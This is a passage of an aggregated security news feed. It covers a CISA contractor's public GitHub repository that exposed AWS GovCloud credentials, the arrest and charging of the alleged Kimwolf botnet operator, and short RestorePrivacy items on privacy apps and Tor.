CISA responded with a brief written statement in response to questions about Ayrey’s findings, saying “CISA is actively responding and coordinating with the appropriate parties and vendors to ensure any identified leaked credentials are rotated and rendered invalid and will continue to take appropriate steps to protect the security of our systems.”

Ayrey said his company Truffle Security monitors GitHub and a number of other code platforms for exposed keys, and attempts to alert affected accounts to the sensitive data exposure(s). They can do this easily on GitHub because the platform publishes a live feed which includes a record of all commits and changes to public code repositories. But he said cybercriminal actors also monitor these public feeds, and are often quick to pounce on API or SSH keys that get inadvertently published in code commits.

The Private CISA GitHub repo exposed dozens of plaintext credentials to important CISA GovCloud resources. The filenames include AWS-Workspace-Bookmarks-April-6-2026.html, AWS-Workspace-Firefox-Passwords.csv, Important AWS Tokens.txt, kube-config.txt, etc.

The Private-CISA GitHub repo exposed dozens of plaintext credentials to important CISA GovCloud resources.

In practical terms, it is likely that cybercrime groups or foreign adversaries also noticed the publication of these CISA secrets, the most egregious of which appears to have happened in late April 2026, Ayrey said.

“We monitor that firehose of data for keys, and we have tools to try to figure out whose they are,” he said. “We have evidence attackers monitor that firehose as well. Anyone monitoring GitHub events could be sitting on this information.”

James Wilson, the enterprise technology editor for the Risky Business security podcast, said organizations using GitHub to manage code projects can set top-down policies that prevent employees from disabling GitHub’s protections against publishing secret keys and credentials. But Wilson’s co-host Adam Boileau said it’s not clear that any technology could stop employees from opening their own personal GitHub account and using it to store sensitive and proprietary information.

“Ultimately, this is a thing you can’t solve with a technical control,” Boileau said on this week’s podcast. “This is a human problem where you’ve hired a contractor to do this work and they have decided of their own volition to use GitHub to synchronize content from a work machine to a home machine. I don’t know what technical controls you could put in place given that this is being done presumably outside of anything CISA managed or even had visibility on.”

Update, 3:05 p.m. ET: Added statement from CISA. Corrected a date in the story (Truffle Security said it found the repo gained some of its most sensitive secrets in late April 2026, not 2025).

Alleged Kimwolf Botmaster ‘Dort’ Arrested, Charged in U.S. and Canada

Krebs on Security May 21, 2026 · 23:50

Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.

A criminal complaint unsealed today in an Alaska district court charges Jacob Butler, a.k.a. “Dort,” of Ottawa, Canada with operating the Kimwolf DDoS botnet. A statement from the Department of Justice says the complaint against Butler was unsealed following the defendant’s arrest in Canada by the Ontario Provincial Police pursuant to a U.S. extradition warrant. Butler is currently in Canadian custody awaiting an initial court hearing scheduled for early next week.

The government said Kimwolf targeted infected devices which were traditionally “firewalled” from the rest of the internet, such as digital photo frames and web cameras. The infected systems were then rented to other cybercriminals, or forced to participate in record-smashing DDoS attacks, as well as assaults that affected Internet address ranges for the Department of Defense. Consequently, the DoD’s Defense Criminal Investigative Service is investigating the case, with assistance from the FBI field office in Anchorage.

“KimWolf was tied to DDoS attacks which were measured at nearly 30 Terabits per second, a record in recorded DDoS attack volume,” the Justice Department statement reads. “These attacks resulted in financial losses which, for some victims, exceeded one million dollars. The KimWolf botnet is alleged to have issued over 25,000 attack commands.”

On March 19, U.S. authorities joined international law enforcement partners in seizing the technical infrastructure for Kimwolf and three other large DDoS botnets — named Aisuru, JackSkid and Mossad — that were all competing for the same pool of vulnerable devices.

On February 28, KrebsOnSecurity identified Butler as the Kimwolf botmaster after digging through his various email addresses, registrations on the cybercrime forums, and posts to public Telegram and Discord servers. However, Dort continued to threaten and harass researchers who helped track down his real-life identity and dramatically slow the spread of his botnet.

Dort claimed responsibility for at least two swatting attacks targeting the founder of Synthient, a security startup that helped to secure a widespread critical security weakness that Kimwolf was using to spread faster and more effectively than any other IoT botnet out there. Synthient was among many technology companies thanked by the Justice Department today, and Synthient’s founder Ben Brundage told KrebsOnSecurity he’s relieved Butler is in custody.

“Hopefully this will end the harassment,” Brundage said.

An excerpt from the criminal complaint against Butler, detailing how he ordered a swatting attack against Ben Brundage, the founder of the security firm Synthient.

The government says investigators connected Butler to the administration of the KimWolf botnet through IP address, online account information, transaction records, and online messaging application records obtained through the issuance of legal process. The criminal complaint against Butler (PDF) shows he did little to separate his real-life and cybercriminal identities (something we demonstrated in our February unmasking of Dort).

In April, the Justice Department joined authorities across Europe in seizing domain names tied to nearly four-dozen DDoS-for-hire services, although because of a bureaucratic mix-up the list of seized domains has remain sealed until today. The DOJ said at least one of those services collaborated with Butler’s Kimwolf botnet.

A statement from the Ontario Provincial Police said a search warrant was executed on March 19 at Butler’s address in Ottawa, where they seized multiple devices. As a result of that investigation, Butler was arrested and charged this week with unauthorized user of computer; possession of device to obtain unauthorized use of computer system or to commit mischief; and mischief in relation to computer data. He is scheduled to remain in custody until a hearing on May 26.

In the United States, Butler is facing one count of aiding and abetting computer intrusion. If extradited, tried and convicted in a U.S. court, Butler could face up to 10 years in prison, although that maximum sentence would likely be heavily tempered by considerations in the U.S. Sentencing Guidelines, which make allowances for mitigating factors such as youth, lack of criminal history and level of cooperation with investigators.

CISA Admin Leaked AWS GovCloud Keys on Github

Krebs on Security May 18, 2026 · 22:48

Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.

On May 15, KrebsOnSecurity heard from Guillaume Valadon, a researcher with the security firm GitGuardian. Valadon’s company constantly scans public code repositories at GitHub and elsewhere for exposed secrets, automatically alerting the offending accounts of any apparent sensitive data exposures. Valadon said he reached out because the owner in this case wasn’t responding and the information exposed was highly sensitive.

A redacted screenshot of the now-defunct “Private CISA” repository maintained by a CISA contractor.

The GitHub repository that Valadon flagged was named “Private-CISA,” and it harbored a vast number of internal CISA/DHS credentials and files, including cloud keys, tokens, plaintext passwords, logs and other sensitive CISA assets.

Valadon said the exposed CISA credentials represent a textbook example of poor security hygiene, noting that the commit logs in the offending GitHub account show that the CISA administrator disabled the default setting in GitHub that blocks users from publishing SSH keys or other secrets in public code repositories.

“Passwords stored in plain text in a csv, backups in git, explicit commands to disable GitHub secrets detection feature,” Valadon wrote in an email. “I honestly believed that it was all fake before analyzing the content deeper. This is indeed the worst leak that I’ve witnessed in my career. It is obviously an individual’s mistake, but I believe that it might reveal internal practices.”

One of the exposed files, titled “importantAWStokens,” included the administrative credentials to three Amazon AWS GovCloud servers. Another file exposed in their public GitHub repository — “AWS-Workspace-Firefox-Passwords.csv” — listed plaintext usernames and passwords for dozens of internal CISA systems. According to Caturegli, those systems included one called “LZ-DSO,” which appears short for “Landing Zone DevSecOps,” the agency’s secure code development environment.

Philippe Caturegli, founder of the security consultancy Seralys, said he tested the AWS keys only to see whether they were still valid and to determine which internal systems the exposed accounts could access. Caturegli said the GitHub account that exposed the CISA secrets exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository.

“The use of both a CISA-associated email address and a personal email address suggests the repository may have been used across differently configured environments,” Caturegli observed. “The available Git metadata alone does not prove which endpoint or device was used.”

The Private CISA GitHub repo exposed dozens of plaintext credentials for important CISA GovCloud resources.

Caturegli said he validated that the exposed credentials could authenticate to three AWS GovCloud accounts at a high privilege level. He said the archive also includes plain text credentials to CISA’s internal “artifactory” — essentially a repository of all the code packages they are using to build software — and that this would represent a juicy target for malicious attackers looking for ways to maintain a persistent foothold in CISA systems.

“That would be a prime place to move laterally,” he said. “Backdoor in some software packages, and every time they build something new they deploy your backdoor left and right.”

In response to questions, a spokesperson for CISA said the agency is aware of the reported exposure and is continuing to investigate the situation.

“Currently, there is no indication that any sensitive data was compromised as a result of this incident,” the CISA spokesperson wrote. “While we hold our team members to the highest standards of integrity and operational awareness, we are working to ensure additional safeguards are implemented to prevent future occurrences.”

A review of the GitHub account and its exposed passwords show the “Private CISA” repository was maintained by an employee of Nightwing, a government contractor based in Dulles, Va. Nightwing declined to comment, directing inquiries to CISA.

CISA has not responded to questions about the potential duration of the data exposure, but Caturegli said the Private CISA repository was created on November 13, 2025. The contractor’s GitHub account was created back in September 2018.

The GitHub account that included the Private CISA repo was taken offline shortly after both KrebsOnSecurity and Seralys notified CISA about the exposure. But Caturegli said the exposed AWS keys inexplicably continued to remain valid for another 48 hours.

CISA is currently operating with only a fraction of its normal budget and staffing levels. The agency has lost nearly a third of its workforce since the beginning of the second Trump administration, which forced a series of early retirements, buyouts, and resignations across the agency’s various divisions.

The now-defunct Private CISA repo showed the contractor also used easily-guessed passwords for a number of internal resources; for example, many of the credentials used a password consisting of each platform’s name followed by the current year. Caturegli said such practices would constitute a serious security threat for any organization even if those credentials were never exposed externally, noting that threat actors often use key credentials exposed on the internal network to expand their reach after establishing initial access to a targeted system.

“What I suspect happened is [the CISA contractor] was using this GitHub to synchronize files between a work laptop and a home computer, because he has regularly committed to this repo since November 2025,” Caturegli said. “This would be an embarrassing leak for any company, but it’s even more so in this case because it’s CISA.”

Signal Introduces Call Links for Simplified Private Group Calls

RestorePrivacy Nov 12, 2024 · 13:01

Signal, the privacy-focused messaging app, has announced new features to enhance its calling experience, making it easier for users to initiate and manage group calls. The primary addition, “Call Links,” allows users to share a link to initiate a call with any contact on Signal without the need to create a group chat. This feature …

The post Signal Introduces Call Links for Simplified Private Group Calls appeared first on RestorePrivacy.

Tor Relays Targeted in IP Spoofing Campaign Causing Widespread Disruptions

RestorePrivacy Nov 8, 2024 · 19:11

The Tor Project is currently facing an unusual, ongoing attack aimed at its infrastructure. For several weeks, an unknown threat actor has been spoofing the IP addresses of Tor relays and directory authorities, sending fake TCP SYN packets over SSH’s port 22. This technique has led to a flood of abuse complaints directed at Tor …

The post Tor Relays Targeted in IP Spoofing Campaign Causing Widespread Disruptions appeared first on RestorePrivacy.

Proton Black Friday Deals Go Live: VPN, Mail, Drive, Pass

RestorePrivacy Oct 28, 2024 · 19:34

Proton has launched its much-anticipated Black Friday sale for 2024, offering incredible discounts on services like Proton VPN, Proton Mail, Drive, and Pass. These Proton deals all include a 30-day money-back guarantee, allowing you to assess the service risk-free. This sale is the perfect chance to boost your online privacy and access premium features at …

The post Proton Black Friday Deals Go Live: VPN, Mail, Drive, Pass appeared first on RestorePrivacy.

Encrypted Messenger Session Moves to Switzerland Amid Privacy Concerns

RestorePrivacy Oct 22, 2024 · 19:16

Session, the encrypted messaging app known for its commitment to privacy and decentralization, announced a change of base from Australia to Switzerland. The app will now be overseen by the newly formed Session Technology Foundation (STF), based in central Europe. This move follows increasing regulatory pressure on privacy technologies in Australia, where the app was …

The post Encrypted Messenger Session Moves to Switzerland Amid Privacy Concerns appeared first on RestorePrivacy.

Mullvad VPN Warns About Traffic Leaks on Latest macOS Sequoia

RestorePrivacy Oct 16, 2024 · 18:37

Mullvad VPN announced that macOS users may experience traffic leaks after applying recent system updates due to a firewall malfunction. According to a bulletin published earlier today on Mullvad’s blog, the macOS firewall fails to enforce certain routing rules properly, allowing some applications to bypass the VPN tunnel and send traffic outside of it. Mullvad …

The post Mullvad VPN Warns About Traffic Leaks on Latest macOS Sequoia appeared first on RestorePrivacy.

Discord Blocked in Russia and Turkey Amid Government Crackdowns

RestorePrivacy Oct 9, 2024 · 15:48

Discord, a popular communication platform, has been blocked in both Russia and Turkey, sparking widespread backlash from users in both countries. In Russia, the block took place yesterday, with the government citing concerns over illegal content, while Turkey implemented blocks a day prior, on October 7, 2024, claiming the platform was being used for criminal …

The post Discord Blocked in Russia and Turkey Amid Government Crackdowns appeared first on RestorePrivacy.

NordVPN Adds NIST-Approved Quantum Encryption on the Linux Client

RestorePrivacy Oct 1, 2024 · 18:07

NordVPN, one of the world’s leading VPN service providers, has launched its first application featuring quantum-resilient encryption. Post-quantum cryptography support is currently available on NordVPN’s Linux client, with plans to extend this security to all applications by the first quarter of 2025. The move represents a significant step toward preparing for potential future threats posed …

The post NordVPN Adds NIST-Approved Quantum Encryption on the Linux Client appeared first on RestorePrivacy.

Mozilla Faces GDPR Complaint Over Firefox Tracking Users Without Consent

RestorePrivacy Sep 25, 2024 · 19:19

The European privacy rights organization noyb has filed a formal complaint against Mozilla for enabling a new feature in its Firefox browser that allegedly tracks users without their consent. The feature in question, called Privacy-Preserving Attribution (PPA), is designed to measure the effectiveness of online advertisements while minimizing data collection, but noyb claims it violates …

The post Mozilla Faces GDPR Complaint Over Firefox Tracking Users Without Consent appeared first on RestorePrivacy.

Telegram to Share User Data with Authorities on Legal Requests

RestorePrivacy Sep 23, 2024 · 22:05

Telegram CEO Pavel Durov announced significant updates to the app’s Terms of Service and Privacy Policy, aimed at bringing the popular communications platform in alignment with the request of authorities to bring criminal activity under control. Most notably, Telegram will now share user IP addresses and phone numbers when responding to valid legal requests. Putting …

The post Telegram to Share User Data with Authorities on Legal Requests appeared first on RestorePrivacy.

Tor Project Reassures Users Amid Claims of De-Anonymization Attack

RestorePrivacy Sep 19, 2024 · 20:06

The Tor Project has issued a statement in response to recent claims of a targeted de-anonymization attack on a Tor user. The attack, reportedly a “timing analysis” method, involved the long-retired Ricochet application. Although the incident raises concerns about the security of Tor’s Onion Services, the project maintains that its network remains healthy and that …

The post Tor Project Reassures Users Amid Claims of De-Anonymization Attack appeared first on RestorePrivacy.